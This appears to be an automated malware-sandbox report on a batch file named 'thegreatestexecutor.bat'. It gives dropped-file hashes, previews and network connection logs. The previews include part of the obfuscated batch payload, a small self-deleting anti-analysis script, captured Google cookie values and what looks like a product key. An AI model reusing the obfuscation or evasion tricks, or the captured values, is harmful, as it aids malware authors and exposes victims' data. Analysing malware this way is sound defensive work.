                                      Encrypted:false
                                      SSDEEP:3:s:s
                                      MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                      SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                      SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                      SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                      Malicious:false
                                      Preview:null
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):288
                                      Entropy (8bit):5.848201849607824
                                      Encrypted:false
                                      SSDEEP:6:PkopYjtLgxbqCRopYxA6WDwyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqvm:copYKNopYxaDxva3UhyL/8ObWN
                                      MD5:A078A91D09F7B2F47BA3BB1501356E96
                                      SHA1:22D8AFDE06015A67D75D5DDA76A3CD27AE1A4E14
                                      SHA-256:9C4CE3823D3039D9DD9D8B6FD9827B358B79F75FA01620B1906CCB6C0D35A707
                                      SHA-512:C06F29B7DE191F9368B4C7E94E891DABFAA7646DE59431EB036B886246E0A3564748E81819D147EE5FEEDEACD4D494DF06997530CE5483DEBB4BDB85AA84A973
                                      Malicious:false
                                      Preview:.google.com.FALSE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07..google.com.FALSE./.TRUE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):674549
                                      Entropy (8bit):7.924330425619594
                                      Encrypted:false
                                      SSDEEP:12288:eRcPJu13ziUwfs6SLSN56UEiHzHeo2nyGc7ENH4:eyPqDp6LN56U57eogVNH4
                                      MD5:6FF568EED5715354A36DAC739921A2E6
                                      SHA1:B1E923053D50BC4BEAF18E915E9300E4C9270A1B
                                      SHA-256:6A0302925A54C2236A65502A65095F417504A163FC15333500BF37086F81406B
                                      SHA-512:3B685404C8061738A9D06B8F656277DB5F29EB62D0C304EE57EE439C790EAB98E70F060C0F9ACF7AC6580233DAF9F1D9F0A915DF54AC554B1CCAB0A8281993A8
                                      Malicious:false
                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w..W...g...L.L.L...v....=..;3....4mf.1.^ !.........^...{h..K......`........}n.O..['.*...$D).{.9...O .s.w08..b.s.wL........Yg.`U.g...o*.a.u3|.............R.|.E.;.,......w..}...."..y..vc.^........gx..(..o[.K..wf2|E9w.K.....o[..SF._v.x.c.f..o.......o...A./..Xz.7v/...B.....b.a..7..97.....g...n...3.._..g.3.....0f.i_...~e]..r}.......8.-.K....O*..[.....m....0f..f....{.q.....,=.s.-......N@l.c?_ik\.k.0|.g.s...[.K..n.....-..n.1.....n..k.m.q]...O.`..?UYz.u$...p.X..a[...1<.n..IWw.....R..Y*.-'..zR...=.....<..rU...C...v>............+*.e{..1...jl.C..=..P.gq|........sy7x.euN|.C.w+1.B=....v...e.F..1n....G]Rs...s.G_Z..[*...B..>..n.1....[........t.8.......s.<.2n.p..t9...t.#/.....s....].....1.a.1..88...n./.l=.|n!.e$F~G.Y........kc[.X.?..y.'+....G...%_p.t..+[..DYSS.../..u..+..Z>..OtK.....^.o.......c...+.9x.{.w.V..Zr...et...Rw......91.8y ....;/.X.|..G......
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):16
                                      Entropy (8bit):3.577819531114783
                                      Encrypted:false
                                      SSDEEP:3:duSXpvn:ISZvn
                                      MD5:754C4C8058C42A330C780C9D5CE6528C
                                      SHA1:FF78F2F701D67B3D33B154ED56BD7038AFD6523F
                                      SHA-256:72010DCCC9ADDF8030577AA792F7E934F7D2F0CA912DF6B745CB2EB380B8CC99
                                      SHA-512:4733C7193B1BEA25D57D50B86AE3FB1429F5EEB6508DE692AC1280DFD3299E78235CD8E4E7883D5B76CBC972597E01170FA067633824F49CBA24826A3DB6C4D9
                                      Malicious:false
                                      Preview:google.com (2)..
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:y:y
                                      MD5:81051BCC2CF1BEDF378224B0A93E2877
                                      SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                      SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                      SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                      Malicious:false
                                      Preview:..
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                      Category:dropped
                                      Size (bytes):28796
                                      Entropy (8bit):4.276576259670964
                                      Encrypted:false
                                      SSDEEP:768:29uDXpPqJiPbkWVw3u54494z5058dG5c595r5g5y5t535f5h5R5d5q5J5253585z:suDXpPqJiPbkWVw3u54494z5058dG5ci
                                      MD5:C0120D0FC36E47A10000D2B4B80B60C2
                                      SHA1:230CD71638158882916B5E2F65F5E56BACDCC93C
                                      SHA-256:840C78211C56AA0B59F9F922D0A43DC553FBC471C20B57DC643CE6396BB262B2
                                      SHA-512:0BA65A7F0F5AA49055C5431D424A50C78B603FE883FFC3DB4D6143A507FB06FEA84F6857FB14895B9C3617D4822F86BD08C85DBAEE61575BD32047EFBE1E082C
                                      Malicious:false
                                      Preview:....................................................................................................................................... ............... .... ...... ............ ...... .... ... ......................... ...... ... ............... ....... ................. ...................................... ... ...........................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):3.2135160449350533
                                      Encrypted:false
                                      SSDEEP:3:QRirkYhl8GnMG1olNlP9:QRTY4hXN9
                                      MD5:96E51190B70C10705DE824B2389733E1
                                      SHA1:260B2EC0893E7072E9AD9C6CE5755339BFA41769
                                      SHA-256:23D7CED40FB7D942C6A280A795FF42D02C7A5D5554EB3E417699419A7B067D37
                                      SHA-512:AD847349BDBEEFC480C923D217B2BBA62900C0983BCF08D5AE5AC3BED091113B1676A9D352CE2AAC3D88AA9E6ED730EFEFF86FC42F64A2373221ED9946E7C126
                                      Malicious:false
                                      Preview:..9.7.W.T.N.-.W.Y.7.D.4.-.G.8.V.3.T.-.C.H.K.P.W.-.2.G.Y.P.4.....
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                      Category:dropped
                                      Size (bytes):3533346
                                      Entropy (8bit):1.9414032132906245
                                      Encrypted:false
                                      SSDEEP:1536:r9M37hEimNW4QbAjC5SMd0aF00kd5Regk1IcIoJkFVcKaoowmgd27/:IENXCbiae0kjRep6VcEo/gUT
                                      MD5:07F9549BA0E65BB2BD47FCF55C60A608
                                      SHA1:50F97F17245B1967AE322F5A72F48184DB4932FA
                                      SHA-256:84617E9C081B6B585582D2589AACE5A0A7887283F9488B5A6D05906F94116F36
                                      SHA-512:D9C2E350D2E963B64C6DA7519CDBF15A56A61131098D608721D2E0773E6632B4CB89B90165B212B83B271B5F136539DFE3586DBEEF8DB6BEDC0D358B8D02CD41
                                      Malicious:true
                                      Preview:..%sBGJojn%>%jKpHiLR%%xDQJTinE%n%SdAfnvusu%%UgNAdjtTS%u%gEZdYfoA%%uzzjGCr%l%zXscVspWK% %TpcLLPsm%2%ZUvRrJQi%%KgNnkvXk%>%mPpRlgDw%%yPjRqBuh%&%FRAZRggHP%%PRiNzPV%1%wZMOrDEY% %vxkweCz%&%UVPDLjjQa%%rVXZmvidH%&%XaIqcXf% %BPXzfTWrq%e%EISUQJc%%fuAEHohYE%x%BlchwEB%%zHBoUmogE%i%ZRlMUPcNm%%FeRwZaR%t%qHCXnaTYq% %BMBdSsX%>%BCtopPcU%%vHXTLMhA%n%sDhJBLh%%eANkvCax%u%xvtjOYl%%dicRMWtmB%l%ChngOuw% %WBBqqhiR%2%DHxykRen%%hiwGRkPEO%>%AciBtYYi%%FMkAQfJ%&%XmARtfiWn%%SwhtKvA%1%eaZMaMfA% %yqCgLJlp%|%YwTfJdaz%%eSvaxLCe%|%VwCwQyEz% %MDpFyVSc%c%DOOoUwhC%%kqcXpLma%l%tpCqygaM%%FmPfvnC%s%xxcOdRCC% ....%qGSXGbla%@%NmsSyzYgi%%wGylWZlD%e%pxdCqitHH%%qWtOKwE%c%tKaprNB%%NZedZxwFC%h%XxCXhXSM%%OfDHQtMM%o%FWsRqDuj% %UjsgQlAV%o%IMTcGRjVy%%FAPEfcV%f%itDYSUX%%uRZScfbyH%f%UyAYUpV% ....%qOdJkjJVn%e%rYDBBZSB%%gsiEHLSuI%c%BqmSWdjo%%nThLPHite%h%ZdLdtYgq%%qZtzhyaKQ%o%nqHwECgu% %cVmvdxvr%@%VvIxQsqw%%EeuHaOnb%e%bSjHZQTx%%puhaqiq%c%xHRdONb%%GvOEesz%h%vTZROzIz%%CCnQisg%o%KwcBRnMV% %CdaDKud%o%IAWCjCY%%YksCdrz%f%DCuRgbH%%QuiHXRToQ%f%jRvVu
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:false
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.017262956703125623
                                      Encrypted:false
                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                      Malicious:false
                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):179
                                      Entropy (8bit):4.690387688466169
                                      Encrypted:false
                                      SSDEEP:3:mKDDgvJxwuMW0naRRRNvHtSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9cSR0vt2hQI1iAMLg34jAxg9EZn
                                      MD5:B820D9D4738F84B00FAC4A544E00D7C7
                                      SHA1:E890C157DFE0248D05A06257B0A086D55EBCC0F5
                                      SHA-256:B4D7AB7C0EAE6B7B75B9B5898E418C50132055E9EBA21F3418DF180AD9A68342
                                      SHA-512:A28EF9F02F8D6DD058EFE674DB07DE2E002718A00FFF8E92F0820F8DEB0AEB5A719D423D646430FAFFB45F24C740D2EA49671D189E507A87DF6588D3B42CFB54
                                      Malicious:false
                                      Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):55
                                      Entropy (8bit):4.306461250274409
                                      Encrypted:false
                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                      Malicious:false
                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                      Process:C:\Windows\System32\net1.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):37
                                      Entropy (8bit):3.6408290408368487
                                      Encrypted:false
                                      SSDEEP:3:gAxKEUTaa:gAMEe
                                      MD5:768165E0ABF16BF3056836D5431A7296
                                      SHA1:9FB3196BE60E49BFC319EBD9E0B103954D711E34
                                      SHA-256:B44C505B721E93E2A596577018CC65B993CD632B9FE7620A4B3DB54031AFFF5D
                                      SHA-512:1250EC40BA20F39A5B9A3AAFD45C63CB6F1BF48B89ACCE1F885470C936FB48A803081943C68458BA1ADCE92D5FE79D3E45682285F56ECB29884D41974269992D
                                      Malicious:false
                                      Preview:There are no entries in the list.....
                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                      Entropy (8bit):1.9414032132906245
                                      TrID:
                                      • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
                                      • Text - UTF-16 (LE) encoded (2002/1) 36.37%
                                      • MP3 audio (1001/1) 18.19%
                                      File name:thegreatestexecutor.bat
                                      File size:3'533'346 bytes
                                      MD5:07f9549ba0e65bb2bd47fcf55c60a608
                                      SHA1:50f97f17245b1967ae322f5a72f48184db4932fa
                                      SHA256:84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36
                                      SHA512:d9c2e350d2e963b64c6da7519cdbf15a56a61131098d608721d2e0773e6632b4cb89b90165b212b83b271b5f136539dfe3586dbeef8db6bedc0d358b8d02cd41
                                      SSDEEP:1536:r9M37hEimNW4QbAjC5SMd0aF00kd5Regk1IcIoJkFVcKaoowmgd27/:IENXCbiae0kjRep6VcEo/gUT
                                      TLSH:C9F5B022431CDE3E63AA526A04D52E1E26C8CBC203715ADFFE545AC5263EF0376693DD
                                      File Content Preview:..%sBGJojn%>%jKpHiLR%%xDQJTinE%n%SdAfnvusu%%UgNAdjtTS%u%gEZdYfoA%%uzzjGCr%l%zXscVspWK% %TpcLLPsm%2%ZUvRrJQi%%KgNnkvXk%>%mPpRlgDw%%yPjRqBuh%&%FRAZRggHP%%PRiNzPV%1%wZMOrDEY% %vxkweCz%&%UVPDLjjQa%%rVXZmvidH%&%XaIqcXf% %BPXzfTWrq%e%EISUQJc%%fuAEHohYE%x%BlchwE
                                      Icon Hash:9686878b929a9886
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Jul 3, 2024 18:08:27.853599072 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.853638887 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.853641033 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.853652000 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.853692055 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.853698015 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.854377031 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.854408979 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.854425907 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.854434013 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.854469061 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.854475975 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.854594946 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.854624987 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.854648113 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.854655981 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.854722023 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.855267048 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.855415106 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.855446100 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.855473042 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.855492115 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.855499029 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.855519056 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.869841099 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.869878054 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.869909048 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.869916916 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.869971037 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.945981026 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946039915 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946079969 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946083069 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.946095943 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946130991 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946167946 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946185112 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.946192026 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946211100 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.946671963 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946708918 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946715117 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.946722984 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.946758032 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.946764946 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.947573900 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.947607040 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.947628021 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.947638035 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.947645903 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.947670937 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.947679996 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.947695017 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.947711945 CEST44349711185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:27.947774887 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:27.950881004 CEST49711443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:29.996722937 CEST49715443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:29.996773958 CEST44349715104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:29.996854067 CEST49715443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:29.997440100 CEST49715443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:29.997457981 CEST44349715104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:30.490699053 CEST44349715104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:30.490784883 CEST49715443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:30.503340960 CEST49715443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:30.503362894 CEST44349715104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:30.503762007 CEST44349715104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:30.509988070 CEST49715443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:30.556499958 CEST44349715104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:30.614196062 CEST44349715104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:30.614311934 CEST44349715104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:30.614376068 CEST49715443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:30.614934921 CEST49715443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:30.648993969 CEST49716443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:30.649040937 CEST44349716104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:30.649219990 CEST49716443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:30.649610043 CEST49716443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:30.649621964 CEST44349716104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:31.113678932 CEST44349716104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:31.119359970 CEST49716443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:31.119379044 CEST44349716104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:31.255012035 CEST44349716104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:31.255146980 CEST44349716104.16.123.96192.168.2.7
                                      Jul 3, 2024 18:08:31.255212069 CEST49716443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:31.268621922 CEST49716443192.168.2.7104.16.123.96
                                      Jul 3, 2024 18:08:31.360903025 CEST4971780192.168.2.7208.95.112.1
                                      Jul 3, 2024 18:08:31.366566896 CEST8049717208.95.112.1192.168.2.7
                                      Jul 3, 2024 18:08:31.366648912 CEST4971780192.168.2.7208.95.112.1
                                      Jul 3, 2024 18:08:31.366832018 CEST4971780192.168.2.7208.95.112.1
                                      Jul 3, 2024 18:08:31.371958017 CEST8049717208.95.112.1192.168.2.7
                                      Jul 3, 2024 18:08:31.868774891 CEST8049717208.95.112.1192.168.2.7
                                      Jul 3, 2024 18:08:31.878092051 CEST4971780192.168.2.7208.95.112.1
                                      Jul 3, 2024 18:08:31.884603024 CEST8049717208.95.112.1192.168.2.7
                                      Jul 3, 2024 18:08:31.982695103 CEST8049717208.95.112.1192.168.2.7
                                      Jul 3, 2024 18:08:32.030489922 CEST4971780192.168.2.7208.95.112.1
                                      Jul 3, 2024 18:08:37.646121025 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:37.646147966 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:37.646708965 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:37.648847103 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:37.648857117 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.293807983 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.293881893 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:38.295614004 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:38.295620918 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.296015024 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.301902056 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:38.348493099 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.691682100 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.691931963 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.691994905 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:38.692006111 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.692050934 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:38.692079067 CEST44349720140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:38.692290068 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:38.692791939 CEST49720443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:38.694667101 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:38.694713116 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:38.694837093 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:38.695132017 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:38.695144892 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.157313108 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.157396078 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:39.158786058 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:39.158799887 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.159038067 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.160252094 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:39.204499960 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720541954 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720608950 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720637083 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720660925 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720686913 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:39.720690966 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720706940 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720730066 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:39.720745087 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:39.720751047 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720766068 CEST44349721185.199.109.133192.168.2.7
                                      Jul 3, 2024 18:08:39.720808029 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:39.722171068 CEST49721443192.168.2.7185.199.109.133
                                      Jul 3, 2024 18:08:49.778712988 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:49.778765917 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:49.778852940 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:49.781660080 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:49.781680107 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:50.430509090 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:50.430602074 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:50.432322979 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:50.432336092 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:50.432691097 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:50.439850092 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:50.480504990 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:50.875499964 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:50.875587940 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:50.875649929 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:50.875663996 CEST44349722140.82.121.3192.168.2.7
                                      Jul 3, 2024 18:08:50.876266956 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:50.876952887 CEST49722443192.168.2.7140.82.121.3
                                      Jul 3, 2024 18:08:50.878392935 CEST49723443192.168.2.7185.199.109.133
